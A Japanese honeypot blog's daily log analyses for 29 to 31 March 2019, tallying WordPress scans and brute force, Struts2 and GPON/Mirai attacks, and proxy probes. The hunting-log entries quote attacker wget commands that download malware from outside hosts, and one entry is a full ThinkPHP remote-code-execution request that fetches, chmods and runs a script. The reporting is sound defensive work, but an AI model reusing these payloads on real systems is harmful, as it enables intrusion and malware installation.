S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2019/03/31)

WOWhoneypotの2019/03/31(日) (運用297日目)の簡易分析です。
本日の総アクセス件数は46件です。送信元IP数は28IPです。
本日の主なアクセスは以下です。

WordPressの調査:18 件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:4 件
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:2 件
・ ThinkPHPの脆弱性を突いた攻撃:1 件

本日のドメイン名でのアクセスは以下です。

3 GET /
1 HEAD /
1 GET /robots.txt

本日のハンティングログは以下です。1つ目はThinkPHP、それ以外はStruts2によるものです。

1 2019-03-31 wget hxxp://82.212.70[.]218/a_thk.sh
1 2019-03-31 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 2019-03-31 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2019-03-31 wget -c hxxp://103.55.13[.]68:13333/Linux.TF

以下が全アクセスログです。

件数 日付 種別 リクエス
19 2019/3/31 アクセス GET /
4 2019/3/31 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
2 2019/3/31 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 POST /GponForm/diag_Form?style/
2 2019/3/31 WordPressの調査 GET /news/wp-login.php
2 2019/3/31 WordPressの調査 GET /news//wp-json/wp/v2/users/
2 2019/3/31 WordPressの調査 GET /news//?author=1
2 2019/3/31 WordPressの調査 GET /blog3/wp-login.php
2 2019/3/31 WordPressの調査 GET /blog3//wp-json/wp/v2/users/
2 2019/3/31 WordPressの調査 GET /blog3//?author=1
2 2019/3/31 WordPressの調査 GET /blog2/wp-login.php
2 2019/3/31 WordPressの調査 GET /blog2//wp-json/wp/v2/users/
2 2019/3/31 WordPressの調査 GET /blog2//?author=1
1 2019/3/31 調査 HEAD /
1 2019/3/31 クローリング GET /robots.txt
1 2019/3/31 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=wget%20hxxp://82.212.70.218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;

以上です。

ハニーポットのログ分析(2019/03/30)

WOWhoneypotの2019/03/30(土) (運用297日目)の簡易分析です。
本日の総アクセス件数は1416件です。送信元IP数は315IPです。
本日の主なアクセスは以下です。

WordPressの調査:915 件
WordPressのログイン試行攻撃:444 件
 →本日も分散ブルートフォースがありました。275IPから来ていました。
・(新規)onexs社のSPA-2012の調査
 →来ていたのは以下、2つのパスです。
 「GET /dms/spa2102/spa2102.xml
 「GET /dms/spa2102/2102.xml
 調べてみるとonexs社のBusiness Pro Spa 2102という機種がありました。恐らくはLinksys SPA 2102のOEM製品などかと思われます。
 「User-Agent: Cisco」でした。
 (参考):https://adoc.tips/business-pro-configuration-guide-spa-2102.html

本日のドメイン名でのアクセスは以下です。

4 GET /
1 GET /robots.txt

本日のハンティングログは以下です。

1 2019-03-30 explorer&wp-submit=Log In&redirect_to=hxxp://210.140.82.234/wp-admin/

以下が全アクセスログです。

件数 日付 種別 リクエス
449 2019/3/30 WordPressの調査 GET /wp-login.php
445 2019/3/30 WordPressの調査 POST /wp-login.php
444 2019/3/30 WordPressのログイン試行攻撃 POST /xmlrpc.php
42 2019/3/30 アクセス GET /
2 2019/3/30 WordPressの調査 GET /shop/wp-login.php
2 2019/3/30 WordPressの調査 GET /shop//wp-json/wp/v2/users/
2 2019/3/30 WordPressの調査 GET /shop//?author=1
2 2019/3/30 WordPressの調査 GET /forum/wp-login.php
2 2019/3/30 WordPressの調査 GET /forum//wp-json/wp/v2/users/
2 2019/3/30 WordPressの調査 GET /forum//?author=1
2 2019/3/30 onexs社のSPA-2012の調査 GET /dms/spa2102/spa2102.xml
2 2019/3/30 onexs社のSPA-2012の調査 GET /dms/spa2102/2102.xml
2 2019/3/30 WordPressの調査 GET /blog/wp-login.php
2 2019/3/30 WordPressの調査 GET /blog//wp-json/wp/v2/users/
2 2019/3/30 WordPressの調査 GET /blog//?author=1
1 2019/3/30 WordPressの調査 GET /vlog/wp-login.php
1 2019/3/30 WordPressの調査 GET /vlog//wp-json/wp/v2/users/
1 2019/3/30 WordPressの調査 GET /vlog//?author=1
1 2019/3/30 Apache Mod_Statusモジュール利用の調査 GET /server-status
1 2019/3/30 クローリング GET /robots.txt
1 2019/3/30 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
1 2019/3/30 不正中継の調査 GET hxxp://www.ip.cn/
1 2019/3/30 不正中継の調査 GET hxxp://www.123cha.com/
1 2019/3/30 不正中継の調査 GET hxxp://www.123cha.com
1 2019/3/30 不正中継の調査 GET hxxp://api.ipify.org/
1 2019/3/30 不正中継の調査 GET hxxp://112.35.66.7:8088/index.php
1 2019/3/30 不正中継の調査 CONNECT www.baidu.com:443
1 2019/3/30 不正中継の調査 CONNECT www.baidu.com
1 2019/3/30 不正中継の調査 CONNECT cn.bing.com:443

以上です。

ハニーポットのログ分析(2019/03/29)

WOWhoneypotの2019/03/29(金) (運用296日目)の簡易分析です。
本日の総アクセス件数は2378件です。送信元IP数は367IPです。
本日の主なアクセスは以下です。

WordPressの調査:1475 件
WordPressのログイン試行攻撃:856 件
 →このところ続いている計300以上のIPから分散ブルートフォースがありました。

・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:3 件
 →User-Agent: Hello, World
  一部はMikrotikとAVTECHから来ていました。

本日のドメイン名でのアクセスは以下です。

6 GET /
2 GET /robots.txt
1 GET /sitemap.xml
1 GET /ads.txt

本日のハンティングログはありませんでした。


以下が全アクセスログです。

件数 日付 種別 リクエス
691 2019/3/29 WordPressの調査 GET /wp-login.php
690 2019/3/29 WordPressのログイン試行攻撃 POST /xmlrpc.php
690 2019/3/29 WordPressの調査 POST /wp-login.php
30 2019/3/29 アクセス GET /
5 2019/3/29 WordPressのログイン試行攻撃 POST /wp/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /wp/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /test/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /test/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /teststite/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /teststite/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /testblog/xmlrpc.php
5 2019/3/29 WordPressの調査 POST /testblog/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /news/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /news/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /mysite/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /mysite/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /myforum/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /myforum/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /myblog/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /myblog/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /info/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /info/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /forum/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /forum/wp-login.php
5 2019/3/29 WordPressXML-RPCに対する攻撃 POST /blog/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /blog/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /2019/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /2019/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /2018/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /2018/wp-login.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /1/xmlrpc.php
5 2019/3/29 WordPressのログイン試行攻撃 POST /1/wp-login.php
5 2019/3/29 WordPressの調査 GET /wp/wp-login.php
5 2019/3/29 WordPressの調査 GET /test/wp-login.php
5 2019/3/29 WordPressの調査 GET /teststite/wp-login.php
5 2019/3/29 WordPressの調査 GET /news/wp-login.php
5 2019/3/29 WordPressの調査 GET /mysite/wp-login.php
5 2019/3/29 WordPressの調査 GET /myforum/wp-login.php
5 2019/3/29 WordPressの調査 GET /myblog/wp-login.php
5 2019/3/29 WordPressの調査 GET /info/wp-login.php
5 2019/3/29 WordPressの調査 GET /forum/wp-login.php
5 2019/3/29 WordPressの調査 GET /blog/wp-login.php
5 2019/3/29 WordPressの調査 GET /2019/wp-login.php
5 2019/3/29 WordPressの調査 GET /2018/wp-login.php
5 2019/3/29 WordPressの調査 GET /1/wp-login.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /wp1/xmlrpc.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /wp1/wp-login.php
4 2019/3/29 WordPressXML-RPCに対する攻撃 POST /wordpress/xmlrpc.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /wordpress/wp-login.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /site/xmlrpc.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /site/wp-login.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /shop/xmlrpc.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /shop/wp-login.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /2017/xmlrpc.php
4 2019/3/29 WordPressのログイン試行攻撃 POST /2017/wp-login.php
4 2019/3/29 WordPressの調査 GET /wp1/wp-login.php
4 2019/3/29 WordPressの調査 GET /wordpress/wp-login.php
4 2019/3/29 WordPressの調査 GET /testblog/wp-login.php
4 2019/3/29 WordPressの調査 GET /site/wp-login.php
4 2019/3/29 WordPressの調査 GET /shop/wp-login.php
4 2019/3/29 WordPressの調査 GET /2017/wp-login.php
3 2019/3/29 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 POST /GponForm/diag_Form?style/
2 2019/3/29 クローリング GET /robots.txt
1 2019/3/29 サイト構成調査 GET /sitemap.xml
1 2019/3/29 調査 GET /script
1 2019/3/29 Dataprovider[.]comによる調査 GET /ads.txt

以上です。